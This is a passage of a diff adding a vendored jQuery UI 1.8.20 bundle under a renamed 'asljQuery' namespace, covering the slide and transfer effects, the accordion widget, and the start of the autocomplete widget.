$.effects.createWrapper(el).css({overflow:'hidden'}); // Create Wrapper
|
5334 |
+
var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left';
|
5335 |
+
var motion = (direction == 'up' || direction == 'left') ? 'pos' : 'neg';
|
5336 |
+
var distance = o.options.distance || (ref == 'top' ? el.outerHeight({margin:true}) : el.outerWidth({margin:true}));
|
5337 |
+
if (mode == 'show') el.css(ref, motion == 'pos' ? (isNaN(distance) ? "-" + distance : -distance) : distance); // Shift
|
5338 |
+
|
5339 |
+
// Animation
|
5340 |
+
var animation = {};
|
5341 |
+
animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance;
|
5342 |
+
|
5343 |
+
// Animate
|
5344 |
+
el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() {
|
5345 |
+
if(mode == 'hide') el.hide(); // Hide
|
5346 |
+
$.effects.restore(el, props); $.effects.removeWrapper(el); // Restore
|
5347 |
+
if(o.callback) o.callback.apply(this, arguments); // Callback
|
5348 |
+
el.dequeue();
|
5349 |
+
}});
|
5350 |
+
|
5351 |
+
});
|
5352 |
+
|
5353 |
+
};
|
5354 |
+
|
5355 |
+
})(asljQuery);
|
5356 |
+
|
5357 |
+
(function( $, undefined ) {
|
5358 |
+
|
5359 |
+
$.effects.transfer = function(o) {
|
5360 |
+
return this.queue(function() {
|
5361 |
+
var elem = $(this),
|
5362 |
+
target = $(o.options.to),
|
5363 |
+
endPosition = target.offset(),
|
5364 |
+
animation = {
|
5365 |
+
top: endPosition.top,
|
5366 |
+
left: endPosition.left,
|
5367 |
+
height: target.innerHeight(),
|
5368 |
+
width: target.innerWidth()
|
5369 |
+
},
|
5370 |
+
startPosition = elem.offset(),
|
5371 |
+
transfer = $('<div class="ui-effects-transfer"></div>')
|
5372 |
+
.appendTo(document.body)
|
5373 |
+
.addClass(o.options.className)
|
5374 |
+
.css({
|
5375 |
+
top: startPosition.top,
|
5376 |
+
left: startPosition.left,
|
5377 |
+
height: elem.innerHeight(),
|
5378 |
+
width: elem.innerWidth(),
|
5379 |
+
position: 'absolute'
|
5380 |
+
})
|
5381 |
+
.animate(animation, o.duration, o.options.easing, function() {
|
5382 |
+
transfer.remove();
|
5383 |
+
(o.callback && o.callback.apply(elem[0], arguments));
|
5384 |
+
elem.dequeue();
|
5385 |
+
});
|
5386 |
+
});
|
5387 |
+
};
|
5388 |
+
|
5389 |
+
})(asljQuery);
|
5390 |
+
|
5391 |
+
(function( $, undefined ) {
|
5392 |
+
|
5393 |
+
$.widget( "ui.accordion", {
|
5394 |
+
options: {
|
5395 |
+
active: 0,
|
5396 |
+
animated: "slide",
|
5397 |
+
autoHeight: true,
|
5398 |
+
clearStyle: false,
|
5399 |
+
collapsible: false,
|
5400 |
+
event: "click",
|
5401 |
+
fillSpace: false,
|
5402 |
+
header: "> li > :first-child,> :not(li):even",
|
5403 |
+
icons: {
|
5404 |
+
header: "ui-icon-triangle-1-e",
|
5405 |
+
headerSelected: "ui-icon-triangle-1-s"
|
5406 |
+
},
|
5407 |
+
navigation: false,
|
5408 |
+
navigationFilter: function() {
|
5409 |
+
return this.href.toLowerCase() === location.href.toLowerCase();
|
5410 |
+
}
|
5411 |
+
},
|
5412 |
+
|
5413 |
+
_create: function() {
|
5414 |
+
var self = this,
|
5415 |
+
options = self.options;
|
5416 |
+
|
5417 |
+
self.running = 0;
|
5418 |
+
|
5419 |
+
self.element
|
5420 |
+
.addClass( "ui-accordion ui-widget ui-helper-reset" )
|
5421 |
+
// in lack of child-selectors in CSS
|
5422 |
+
// we need to mark top-LIs in a UL-accordion for some IE-fix
|
5423 |
+
.children( "li" )
|
5424 |
+
.addClass( "ui-accordion-li-fix" );
|
5425 |
+
|
5426 |
+
self.headers = self.element.find( options.header )
|
5427 |
+
.addClass( "ui-accordion-header ui-helper-reset ui-state-default ui-corner-all" )
|
5428 |
+
.bind( "mouseenter.accordion", function() {
|
5429 |
+
if ( options.disabled ) {
|
5430 |
+
return;
|
5431 |
+
}
|
5432 |
+
$( this ).addClass( "ui-state-hover" );
|
5433 |
+
})
|
5434 |
+
.bind( "mouseleave.accordion", function() {
|
5435 |
+
if ( options.disabled ) {
|
5436 |
+
return;
|
5437 |
+
}
|
5438 |
+
$( this ).removeClass( "ui-state-hover" );
|
5439 |
+
})
|
5440 |
+
.bind( "focus.accordion", function() {
|
5441 |
+
if ( options.disabled ) {
|
5442 |
+
return;
|
5443 |
+
}
|
5444 |
+
$( this ).addClass( "ui-state-focus" );
|
5445 |
+
})
|
5446 |
+
.bind( "blur.accordion", function() {
|
5447 |
+
if ( options.disabled ) {
|
5448 |
+
return;
|
5449 |
+
}
|
5450 |
+
$( this ).removeClass( "ui-state-focus" );
|
5451 |
+
});
|
5452 |
+
|
5453 |
+
self.headers.next()
|
5454 |
+
.addClass( "ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" );
|
5455 |
+
|
5456 |
+
if ( options.navigation ) {
|
5457 |
+
var current = self.element.find( "a" ).filter( options.navigationFilter ).eq( 0 );
|
5458 |
+
if ( current.length ) {
|
5459 |
+
var header = current.closest( ".ui-accordion-header" );
|
5460 |
+
if ( header.length ) {
|
5461 |
+
// anchor within header
|
5462 |
+
self.active = header;
|
5463 |
+
} else {
|
5464 |
+
// anchor within content
|
5465 |
+
self.active = current.closest( ".ui-accordion-content" ).prev();
|
5466 |
+
}
|
5467 |
+
}
|
5468 |
+
}
|
5469 |
+
|
5470 |
+
self.active = self._findActive( self.active || options.active )
|
5471 |
+
.addClass( "ui-state-default ui-state-active" )
|
5472 |
+
.toggleClass( "ui-corner-all" )
|
5473 |
+
.toggleClass( "ui-corner-top" );
|
5474 |
+
self.active.next().addClass( "ui-accordion-content-active" );
|
5475 |
+
|
5476 |
+
self._createIcons();
|
5477 |
+
self.resize();
|
5478 |
+
|
5479 |
+
// ARIA
|
5480 |
+
self.element.attr( "role", "tablist" );
|
5481 |
+
|
5482 |
+
self.headers
|
5483 |
+
.attr( "role", "tab" )
|
5484 |
+
.bind( "keydown.accordion", function( event ) {
|
5485 |
+
return self._keydown( event );
|
5486 |
+
})
|
5487 |
+
.next()
|
5488 |
+
.attr( "role", "tabpanel" );
|
5489 |
+
|
5490 |
+
self.headers
|
5491 |
+
.not( self.active || "" )
|
5492 |
+
.attr({
|
5493 |
+
"aria-expanded": "false",
|
5494 |
+
"aria-selected": "false",
|
5495 |
+
tabIndex: -1
|
5496 |
+
})
|
5497 |
+
.next()
|
5498 |
+
.hide();
|
5499 |
+
|
5500 |
+
// make sure at least one header is in the tab order
|
5501 |
+
if ( !self.active.length ) {
|
5502 |
+
self.headers.eq( 0 ).attr( "tabIndex", 0 );
|
5503 |
+
} else {
|
5504 |
+
self.active
|
5505 |
+
.attr({
|
5506 |
+
"aria-expanded": "true",
|
5507 |
+
"aria-selected": "true",
|
5508 |
+
tabIndex: 0
|
5509 |
+
});
|
5510 |
+
}
|
5511 |
+
|
5512 |
+
// only need links in tab order for Safari
|
5513 |
+
if ( !$.browser.safari ) {
|
5514 |
+
self.headers.find( "a" ).attr( "tabIndex", -1 );
|
5515 |
+
}
|
5516 |
+
|
5517 |
+
if ( options.event ) {
|
5518 |
+
self.headers.bind( options.event.split(" ").join(".accordion ") + ".accordion", function(event) {
|
5519 |
+
self._clickHandler.call( self, event, this );
|
5520 |
+
event.preventDefault();
|
5521 |
+
});
|
5522 |
+
}
|
5523 |
+
},
|
5524 |
+
|
5525 |
+
_createIcons: function() {
|
5526 |
+
var options = this.options;
|
5527 |
+
if ( options.icons ) {
|
5528 |
+
$( "<span></span>" )
|
5529 |
+
.addClass( "ui-icon " + options.icons.header )
|
5530 |
+
.prependTo( this.headers );
|
5531 |
+
this.active.children( ".ui-icon" )
|
5532 |
+
.toggleClass(options.icons.header)
|
5533 |
+
.toggleClass(options.icons.headerSelected);
|
5534 |
+
this.element.addClass( "ui-accordion-icons" );
|
5535 |
+
}
|
5536 |
+
},
|
5537 |
+
|
5538 |
+
_destroyIcons: function() {
|
5539 |
+
this.headers.children( ".ui-icon" ).remove();
|
5540 |
+
this.element.removeClass( "ui-accordion-icons" );
|
5541 |
+
},
|
5542 |
+
|
5543 |
+
destroy: function() {
|
5544 |
+
var options = this.options;
|
5545 |
+
|
5546 |
+
this.element
|
5547 |
+
.removeClass( "ui-accordion ui-widget ui-helper-reset" )
|
5548 |
+
.removeAttr( "role" );
|
5549 |
+
|
5550 |
+
this.headers
|
5551 |
+
.unbind( ".accordion" )
|
5552 |
+
.removeClass( "ui-accordion-header ui-accordion-disabled ui-helper-reset ui-state-default ui-corner-all ui-state-active ui-state-disabled ui-corner-top" )
|
5553 |
+
.removeAttr( "role" )
|
5554 |
+
.removeAttr( "aria-expanded" )
|
5555 |
+
.removeAttr( "aria-selected" )
|
5556 |
+
.removeAttr( "tabIndex" );
|
5557 |
+
|
5558 |
+
this.headers.find( "a" ).removeAttr( "tabIndex" );
|
5559 |
+
this._destroyIcons();
|
5560 |
+
var contents = this.headers.next()
|
5561 |
+
.css( "display", "" )
|
5562 |
+
.removeAttr( "role" )
|
5563 |
+
.removeClass( "ui-helper-reset ui-widget-content ui-corner-bottom ui-accordion-content ui-accordion-content-active ui-accordion-disabled ui-state-disabled" );
|
5564 |
+
if ( options.autoHeight || options.fillHeight ) {
|
5565 |
+
contents.css( "height", "" );
|
5566 |
+
}
|
5567 |
+
|
5568 |
+
return $.Widget.prototype.destroy.call( this );
|
5569 |
+
},
|
5570 |
+
|
5571 |
+
_setOption: function( key, value ) {
|
5572 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
5573 |
+
|
5574 |
+
if ( key == "active" ) {
|
5575 |
+
this.activate( value );
|
5576 |
+
}
|
5577 |
+
if ( key == "icons" ) {
|
5578 |
+
this._destroyIcons();
|
5579 |
+
if ( value ) {
|
5580 |
+
this._createIcons();
|
5581 |
+
}
|
5582 |
+
}
|
5583 |
+
// #5332 - opacity doesn't cascade to positioned elements in IE
|
5584 |
+
// so we need to add the disabled class to the headers and panels
|
5585 |
+
if ( key == "disabled" ) {
|
5586 |
+
this.headers.add(this.headers.next())
|
5587 |
+
[ value ? "addClass" : "removeClass" ](
|
5588 |
+
"ui-accordion-disabled ui-state-disabled" );
|
5589 |
+
}
|
5590 |
+
},
|
5591 |
+
|
5592 |
+
_keydown: function( event ) {
|
5593 |
+
if ( this.options.disabled || event.altKey || event.ctrlKey ) {
|
5594 |
+
return;
|
5595 |
+
}
|
5596 |
+
|
5597 |
+
var keyCode = $.ui.keyCode,
|
5598 |
+
length = this.headers.length,
|
5599 |
+
currentIndex = this.headers.index( event.target ),
|
5600 |
+
toFocus = false;
|
5601 |
+
|
5602 |
+
switch ( event.keyCode ) {
|
5603 |
+
case keyCode.RIGHT:
|
5604 |
+
case keyCode.DOWN:
|
5605 |
+
toFocus = this.headers[ ( currentIndex + 1 ) % length ];
|
5606 |
+
break;
|
5607 |
+
case keyCode.LEFT:
|
5608 |
+
case keyCode.UP:
|
5609 |
+
toFocus = this.headers[ ( currentIndex - 1 + length ) % length ];
|
5610 |
+
break;
|
5611 |
+
case keyCode.SPACE:
|
5612 |
+
case keyCode.ENTER:
|
5613 |
+
this._clickHandler( { target: event.target }, event.target );
|
5614 |
+
event.preventDefault();
|
5615 |
+
}
|
5616 |
+
|
5617 |
+
if ( toFocus ) {
|
5618 |
+
$( event.target ).attr( "tabIndex", -1 );
|
5619 |
+
$( toFocus ).attr( "tabIndex", 0 );
|
5620 |
+
toFocus.focus();
|
5621 |
+
return false;
|
5622 |
+
}
|
5623 |
+
|
5624 |
+
return true;
|
5625 |
+
},
|
5626 |
+
|
5627 |
+
resize: function() {
|
5628 |
+
var options = this.options,
|
5629 |
+
maxHeight;
|
5630 |
+
|
5631 |
+
if ( options.fillSpace ) {
|
5632 |
+
if ( $.browser.msie ) {
|
5633 |
+
var defOverflow = this.element.parent().css( "overflow" );
|
5634 |
+
this.element.parent().css( "overflow", "hidden");
|
5635 |
+
}
|
5636 |
+
maxHeight = this.element.parent().height();
|
5637 |
+
if ($.browser.msie) {
|
5638 |
+
this.element.parent().css( "overflow", defOverflow );
|
5639 |
+
}
|
5640 |
+
|
5641 |
+
this.headers.each(function() {
|
5642 |
+
maxHeight -= $( this ).outerHeight( true );
|
5643 |
+
});
|
5644 |
+
|
5645 |
+
this.headers.next()
|
5646 |
+
.each(function() {
|
5647 |
+
$( this ).height( Math.max( 0, maxHeight -
|
5648 |
+
$( this ).innerHeight() + $( this ).height() ) );
|
5649 |
+
})
|
5650 |
+
.css( "overflow", "auto" );
|
5651 |
+
} else if ( options.autoHeight ) {
|
5652 |
+
maxHeight = 0;
|
5653 |
+
this.headers.next()
|
5654 |
+
.each(function() {
|
5655 |
+
maxHeight = Math.max( maxHeight, $( this ).height( "" ).height() );
|
5656 |
+
})
|
5657 |
+
.height( maxHeight );
|
5658 |
+
}
|
5659 |
+
|
5660 |
+
return this;
|
5661 |
+
},
|
5662 |
+
|
5663 |
+
activate: function( index ) {
|
5664 |
+
// TODO this gets called on init, changing the option without an explicit call for that
|
5665 |
+
this.options.active = index;
|
5666 |
+
// call clickHandler with custom event
|
5667 |
+
var active = this._findActive( index )[ 0 ];
|
5668 |
+
this._clickHandler( { target: active }, active );
|
5669 |
+
|
5670 |
+
return this;
|
5671 |
+
},
|
5672 |
+
|
5673 |
+
_findActive: function( selector ) {
|
5674 |
+
return selector
|
5675 |
+
? typeof selector === "number"
|
5676 |
+
? this.headers.filter( ":eq(" + selector + ")" )
|
5677 |
+
: this.headers.not( this.headers.not( selector ) )
|
5678 |
+
: selector === false
|
5679 |
+
? $( [] )
|
5680 |
+
: this.headers.filter( ":eq(0)" );
|
5681 |
+
},
|
5682 |
+
|
5683 |
+
// TODO isn't event.target enough? why the separate target argument?
|
5684 |
+
_clickHandler: function( event, target ) {
|
5685 |
+
var options = this.options;
|
5686 |
+
if ( options.disabled ) {
|
5687 |
+
return;
|
5688 |
+
}
|
5689 |
+
|
5690 |
+
// called only when using activate(false) to close all parts programmatically
|
5691 |
+
if ( !event.target ) {
|
5692 |
+
if ( !options.collapsible ) {
|
5693 |
+
return;
|
5694 |
+
}
|
5695 |
+
this.active
|
5696 |
+
.removeClass( "ui-state-active ui-corner-top" )
|
5697 |
+
.addClass( "ui-state-default ui-corner-all" )
|
5698 |
+
.children( ".ui-icon" )
|
5699 |
+
.removeClass( options.icons.headerSelected )
|
5700 |
+
.addClass( options.icons.header );
|
5701 |
+
this.active.next().addClass( "ui-accordion-content-active" );
|
5702 |
+
var toHide = this.active.next(),
|
5703 |
+
data = {
|
5704 |
+
options: options,
|
5705 |
+
newHeader: $( [] ),
|
5706 |
+
oldHeader: options.active,
|
5707 |
+
newContent: $( [] ),
|
5708 |
+
oldContent: toHide
|
5709 |
+
},
|
5710 |
+
toShow = ( this.active = $( [] ) );
|
5711 |
+
this._toggle( toShow, toHide, data );
|
5712 |
+
return;
|
5713 |
+
}
|
5714 |
+
|
5715 |
+
// get the click target
|
5716 |
+
var clicked = $( event.currentTarget || target ),
|
5717 |
+
clickedIsActive = clicked[0] === this.active[0];
|
5718 |
+
|
5719 |
+
// TODO the option is changed, is that correct?
|
5720 |
+
// TODO if it is correct, shouldn't that happen after determining that the click is valid?
|
5721 |
+
options.active = options.collapsible && clickedIsActive ?
|
5722 |
+
false :
|
5723 |
+
this.headers.index( clicked );
|
5724 |
+
|
5725 |
+
// if animations are still active, or the active header is the target, ignore click
|
5726 |
+
if ( this.running || ( !options.collapsible && clickedIsActive ) ) {
|
5727 |
+
return;
|
5728 |
+
}
|
5729 |
+
|
5730 |
+
// find elements to show and hide
|
5731 |
+
var active = this.active,
|
5732 |
+
toShow = clicked.next(),
|
5733 |
+
toHide = this.active.next(),
|
5734 |
+
data = {
|
5735 |
+
options: options,
|
5736 |
+
newHeader: clickedIsActive && options.collapsible ? $([]) : clicked,
|
5737 |
+
oldHeader: this.active,
|
5738 |
+
newContent: clickedIsActive && options.collapsible ? $([]) : toShow,
|
5739 |
+
oldContent: toHide
|
5740 |
+
},
|
5741 |
+
down = this.headers.index( this.active[0] ) > this.headers.index( clicked[0] );
|
5742 |
+
|
5743 |
+
// when the call to ._toggle() comes after the class changes
|
5744 |
+
// it causes a very odd bug in IE 8 (see #6720)
|
5745 |
+
this.active = clickedIsActive ? $([]) : clicked;
|
5746 |
+
this._toggle( toShow, toHide, data, clickedIsActive, down );
|
5747 |
+
|
5748 |
+
// switch classes
|
5749 |
+
active
|
5750 |
+
.removeClass( "ui-state-active ui-corner-top" )
|
5751 |
+
.addClass( "ui-state-default ui-corner-all" )
|
5752 |
+
.children( ".ui-icon" )
|
5753 |
+
.removeClass( options.icons.headerSelected )
|
5754 |
+
.addClass( options.icons.header );
|
5755 |
+
if ( !clickedIsActive ) {
|
5756 |
+
clicked
|
5757 |
+
.removeClass( "ui-state-default ui-corner-all" )
|
5758 |
+
.addClass( "ui-state-active ui-corner-top" )
|
5759 |
+
.children( ".ui-icon" )
|
5760 |
+
.removeClass( options.icons.header )
|
5761 |
+
.addClass( options.icons.headerSelected );
|
5762 |
+
clicked
|
5763 |
+
.next()
|
5764 |
+
.addClass( "ui-accordion-content-active" );
|
5765 |
+
}
|
5766 |
+
|
5767 |
+
return;
|
5768 |
+
},
|
5769 |
+
|
5770 |
+
_toggle: function( toShow, toHide, data, clickedIsActive, down ) {
|
5771 |
+
var self = this,
|
5772 |
+
options = self.options;
|
5773 |
+
|
5774 |
+
self.toShow = toShow;
|
5775 |
+
self.toHide = toHide;
|
5776 |
+
self.data = data;
|
5777 |
+
|
5778 |
+
var complete = function() {
|
5779 |
+
if ( !self ) {
|
5780 |
+
return;
|
5781 |
+
}
|
5782 |
+
return self._completed.apply( self, arguments );
|
5783 |
+
};
|
5784 |
+
|
5785 |
+
// trigger changestart event
|
5786 |
+
self._trigger( "changestart", null, self.data );
|
5787 |
+
|
5788 |
+
// count elements to animate
|
5789 |
+
self.running = toHide.size() === 0 ? toShow.size() : toHide.size();
|
5790 |
+
|
5791 |
+
if ( options.animated ) {
|
5792 |
+
var animOptions = {};
|
5793 |
+
|
5794 |
+
if ( options.collapsible && clickedIsActive ) {
|
5795 |
+
animOptions = {
|
5796 |
+
toShow: $( [] ),
|
5797 |
+
toHide: toHide,
|
5798 |
+
complete: complete,
|
5799 |
+
down: down,
|
5800 |
+
autoHeight: options.autoHeight || options.fillSpace
|
5801 |
+
};
|
5802 |
+
} else {
|
5803 |
+
animOptions = {
|
5804 |
+
toShow: toShow,
|
5805 |
+
toHide: toHide,
|
5806 |
+
complete: complete,
|
5807 |
+
down: down,
|
5808 |
+
autoHeight: options.autoHeight || options.fillSpace
|
5809 |
+
};
|
5810 |
+
}
|
5811 |
+
|
5812 |
+
if ( !options.proxied ) {
|
5813 |
+
options.proxied = options.animated;
|
5814 |
+
}
|
5815 |
+
|
5816 |
+
if ( !options.proxiedDuration ) {
|
5817 |
+
options.proxiedDuration = options.duration;
|
5818 |
+
}
|
5819 |
+
|
5820 |
+
options.animated = $.isFunction( options.proxied ) ?
|
5821 |
+
options.proxied( animOptions ) :
|
5822 |
+
options.proxied;
|
5823 |
+
|
5824 |
+
options.duration = $.isFunction( options.proxiedDuration ) ?
|
5825 |
+
options.proxiedDuration( animOptions ) :
|
5826 |
+
options.proxiedDuration;
|
5827 |
+
|
5828 |
+
var animations = $.ui.accordion.animations,
|
5829 |
+
duration = options.duration,
|
5830 |
+
easing = options.animated;
|
5831 |
+
|
5832 |
+
if ( easing && !animations[ easing ] && !$.easing[ easing ] ) {
|
5833 |
+
easing = "slide";
|
5834 |
+
}
|
5835 |
+
if ( !animations[ easing ] ) {
|
5836 |
+
animations[ easing ] = function( options ) {
|
5837 |
+
this.slide( options, {
|
5838 |
+
easing: easing,
|
5839 |
+
duration: duration || 700
|
5840 |
+
});
|
5841 |
+
};
|
5842 |
+
}
|
5843 |
+
|
5844 |
+
animations[ easing ]( animOptions );
|
5845 |
+
} else {
|
5846 |
+
if ( options.collapsible && clickedIsActive ) {
|
5847 |
+
toShow.toggle();
|
5848 |
+
} else {
|
5849 |
+
toHide.hide();
|
5850 |
+
toShow.show();
|
5851 |
+
}
|
5852 |
+
|
5853 |
+
complete( true );
|
5854 |
+
}
|
5855 |
+
|
5856 |
+
// TODO assert that the blur and focus triggers are really necessary, remove otherwise
|
5857 |
+
toHide.prev()
|
5858 |
+
.attr({
|
5859 |
+
"aria-expanded": "false",
|
5860 |
+
"aria-selected": "false",
|
5861 |
+
tabIndex: -1
|
5862 |
+
})
|
5863 |
+
.blur();
|
5864 |
+
toShow.prev()
|
5865 |
+
.attr({
|
5866 |
+
"aria-expanded": "true",
|
5867 |
+
"aria-selected": "true",
|
5868 |
+
tabIndex: 0
|
5869 |
+
})
|
5870 |
+
.focus();
|
5871 |
+
},
|
5872 |
+
|
5873 |
+
_completed: function( cancel ) {
|
5874 |
+
this.running = cancel ? 0 : --this.running;
|
5875 |
+
if ( this.running ) {
|
5876 |
+
return;
|
5877 |
+
}
|
5878 |
+
|
5879 |
+
if ( this.options.clearStyle ) {
|
5880 |
+
this.toShow.add( this.toHide ).css({
|
5881 |
+
height: "",
|
5882 |
+
overflow: ""
|
5883 |
+
});
|
5884 |
+
}
|
5885 |
+
|
5886 |
+
// other classes are removed before the animation; this one needs to stay until completed
|
5887 |
+
this.toHide.removeClass( "ui-accordion-content-active" );
|
5888 |
+
// Work around for rendering bug in IE (#5421)
|
5889 |
+
if ( this.toHide.length ) {
|
5890 |
+
this.toHide.parent()[0].className = this.toHide.parent()[0].className;
|
5891 |
+
}
|
5892 |
+
|
5893 |
+
this._trigger( "change", null, this.data );
|
5894 |
+
}
|
5895 |
+
});
|
5896 |
+
|
5897 |
+
$.extend( $.ui.accordion, {
|
5898 |
+
version: "1.8.20",
|
5899 |
+
animations: {
|
5900 |
+
slide: function( options, additions ) {
|
5901 |
+
options = $.extend({
|
5902 |
+
easing: "swing",
|
5903 |
+
duration: 300
|
5904 |
+
}, options, additions );
|
5905 |
+
if ( !options.toHide.size() ) {
|
5906 |
+
options.toShow.animate({
|
5907 |
+
height: "show",
|
5908 |
+
paddingTop: "show",
|
5909 |
+
paddingBottom: "show"
|
5910 |
+
}, options );
|
5911 |
+
return;
|
5912 |
+
}
|
5913 |
+
if ( !options.toShow.size() ) {
|
5914 |
+
options.toHide.animate({
|
5915 |
+
height: "hide",
|
5916 |
+
paddingTop: "hide",
|
5917 |
+
paddingBottom: "hide"
|
5918 |
+
}, options );
|
5919 |
+
return;
|
5920 |
+
}
|
5921 |
+
var overflow = options.toShow.css( "overflow" ),
|
5922 |
+
percentDone = 0,
|
5923 |
+
showProps = {},
|
5924 |
+
hideProps = {},
|
5925 |
+
fxAttrs = [ "height", "paddingTop", "paddingBottom" ],
|
5926 |
+
originalWidth;
|
5927 |
+
// fix width before calculating height of hidden element
|
5928 |
+
var s = options.toShow;
|
5929 |
+
originalWidth = s[0].style.width;
|
5930 |
+
s.width( s.parent().width()
|
5931 |
+
- parseFloat( s.css( "paddingLeft" ) )
|
5932 |
+
- parseFloat( s.css( "paddingRight" ) )
|
5933 |
+
- ( parseFloat( s.css( "borderLeftWidth" ) ) || 0 )
|
5934 |
+
- ( parseFloat( s.css( "borderRightWidth" ) ) || 0 ) );
|
5935 |
+
|
5936 |
+
$.each( fxAttrs, function( i, prop ) {
|
5937 |
+
hideProps[ prop ] = "hide";
|
5938 |
+
|
5939 |
+
var parts = ( "" + $.css( options.toShow[0], prop ) ).match( /^([\d+-.]+)(.*)$/ );
|
5940 |
+
showProps[ prop ] = {
|
5941 |
+
value: parts[ 1 ],
|
5942 |
+
unit: parts[ 2 ] || "px"
|
5943 |
+
};
|
5944 |
+
});
|
5945 |
+
options.toShow.css({ height: 0, overflow: "hidden" }).show();
|
5946 |
+
options.toHide
|
5947 |
+
.filter( ":hidden" )
|
5948 |
+
.each( options.complete )
|
5949 |
+
.end()
|
5950 |
+
.filter( ":visible" )
|
5951 |
+
.animate( hideProps, {
|
5952 |
+
step: function( now, settings ) {
|
5953 |
+
// only calculate the percent when animating height
|
5954 |
+
// IE gets very inconsistent results when animating elements
|
5955 |
+
// with small values, which is common for padding
|
5956 |
+
if ( settings.prop == "height" ) {
|
5957 |
+
percentDone = ( settings.end - settings.start === 0 ) ? 0 :
|
5958 |
+
( settings.now - settings.start ) / ( settings.end - settings.start );
|
5959 |
+
}
|
5960 |
+
|
5961 |
+
options.toShow[ 0 ].style[ settings.prop ] =
|
5962 |
+
( percentDone * showProps[ settings.prop ].value )
|
5963 |
+
+ showProps[ settings.prop ].unit;
|
5964 |
+
},
|
5965 |
+
duration: options.duration,
|
5966 |
+
easing: options.easing,
|
5967 |
+
complete: function() {
|
5968 |
+
if ( !options.autoHeight ) {
|
5969 |
+
options.toShow.css( "height", "" );
|
5970 |
+
}
|
5971 |
+
options.toShow.css({
|
5972 |
+
width: originalWidth,
|
5973 |
+
overflow: overflow
|
5974 |
+
});
|
5975 |
+
options.complete();
|
5976 |
+
}
|
5977 |
+
});
|
5978 |
+
},
|
5979 |
+
bounceslide: function( options ) {
|
5980 |
+
this.slide( options, {
|
5981 |
+
easing: options.down ? "easeOutBounce" : "swing",
|
5982 |
+
duration: options.down ? 1000 : 200
|
5983 |
+
});
|
5984 |
+
}
|
5985 |
+
}
|
5986 |
+
});
|
5987 |
+
|
5988 |
+
})(asljQuery);
|
5989 |
+
|
5990 |
+
(function( $, undefined ) {
|
5991 |
+
|
5992 |
+
// used to prevent race conditions with remote data sources
|
5993 |
+
var requestIndex = 0;
|
5994 |
+
|
5995 |
+
$.widget( "ui.autocomplete", {
|
5996 |
+
options: {
|
5997 |
+
appendTo: "body",
|
5998 |
+
autoFocus: false,
|
5999 |
+
delay: 300,
|
6000 |
+
minLength: 1,
|
6001 |
+
position: {
|
6002 |
+
my: "left top",
|
6003 |
+
at: "left bottom",
|
6004 |
+
collision: "none"
|
6005 |
+
},
|
6006 |
+
source: null
|
6007 |
+
},
|
6008 |
+
|
6009 |
+
pending: 0,
|
6010 |
+
|
6011 |
+
_create: function() {
|
6012 |
+
var self = this,
|
6013 |
+
doc = this.element[ 0 ].ownerDocument,
|
6014 |
+
suppressKeyPress;
|
6015 |
+
this.isMultiLine = this.element.is( "textarea" );
|
6016 |
+
|
6017 |
+
this.element
|
6018 |
+
.addClass( "ui-autocomplete-input" )
|
6019 |
+
.attr( "autocomplete", "off" )
|
6020 |
+
// TODO verify these actually work as intended
|
6021 |
+
.attr({
|
6022 |
+
role: "textbox",
|
6023 |
+
"aria-autocomplete": "list",
|
6024 |
+
"aria-haspopup": "true"
|
6025 |
+
})
|
6026 |
+
.bind( "keydown.autocomplete", function( event ) {
|
6027 |
+
if ( self.options.disabled || self.element.propAttr( "readOnly" ) ) {
|
6028 |
+
return;
|
6029 |
+
}
|
6030 |
+
|
6031 |
+
suppressKeyPress = false;
|
6032 |
+
var keyCode = $.ui.keyCode;
|
6033 |
+
switch( event.keyCode ) {
|
6034 |
+
case keyCode.PAGE_UP:
|
6035 |
+
self._move( "previousPage", event );
|
6036 |
+
break;
|
6037 |
+
case keyCode.PAGE_DOWN:
|
6038 |
+
self._move( "nextPage", event );
|
6039 |
+
break;
|
6040 |
+
case keyCode.UP:
|
6041 |
+
self._keyEvent( "previous", event );
|
6042 |
+
break;
|
6043 |
+
case keyCode.DOWN:
|
6044 |
+
self._keyEvent( "next", event );
|
6045 |
+
break;
|
6046 |
+
case keyCode.ENTER:
|
6047 |
+
case keyCode.NUMPAD_ENTER:
|
6048 |
+
// when menu is open and has focus
|
6049 |
+
if ( self.menu.active ) {
|
6050 |
+
// #6055 - Opera still allows the keypress to occur
|
6051 |
+
// which causes forms to submit
|
6052 |
+
suppressKeyPress = true;
|
6053 |
+
event.preventDefault();
|
6054 |
+
}
|
6055 |
+
//passthrough - ENTER and TAB both select the current element
|
6056 |
+
case keyCode.TAB:
|
6057 |
+
if ( !self.menu.active ) {
|
6058 |
+
return;
|
6059 |
+
}
|
6060 |
+
self.menu.select( event );
|
6061 |
+
break;
|
6062 |
+
case keyCode.ESCAPE:
|
6063 |
+
self.element.val( self.term );
|
6064 |
+
self.close( event );
|
6065 |
+
break;
|
6066 |
+
default:
|
6067 |
+
// keypress is triggered before the input value is changed
|
6068 |
+
clearTimeout( self.searching );
|
6069 |
+
self.searching = setTimeout(function() {
|
6070 |
+
// only search if the value has changed
|
6071 |
+
if ( self.term != self.element.val() ) {
|
6072 |
+
self.selectedItem = null;
|
6073 |
+
self.search( null, event );
|
6074 |
+
}
|
6075 |
+
}, self.options.delay );
|
6076 |
+
break;
|
6077 |
+
}
|
6078 |
+
})
|
6079 |
+
.bind( "keypress.autocomplete", function( event ) {
|
6080 |
+
if ( suppressKeyPress ) {
|
6081 |
+
suppressKeyPress = false;
|
6082 |
+
event.preventDefault();
|
6083 |
+
}
|
6084 |
+
})
|
6085 |
+
.bind( "focus.autocomplete", function() {
|
6086 |
+
if ( self.options.disabled ) {
|
6087 |
+
return;
|
6088 |
+
}
|
6089 |
+
|
6090 |
+
self.selectedItem = null;
|
6091 |
+
self.previous = self.element.val();
|
6092 |
+
})
|
6093 |
+
.bind( "blur.autocomplete", function( event ) {
|
6094 |
+
if ( self.options.disabled ) {
|
6095 |
+
return;
|
6096 |
+
}
|
6097 |
+
|
6098 |
+
clearTimeout( self.searching );
|
6099 |
+
// clicks on the menu (or a button to trigger a search) will cause a blur event
|
6100 |
+
self.closing = setTimeout(function() {
|
6101 |
+
self.close( event );
|
6102 |
+
self._change( event );
|
6103 |
+
}, 150 );
|
6104 |
+
});
|
6105 |
+
this._initSource();
|
6106 |
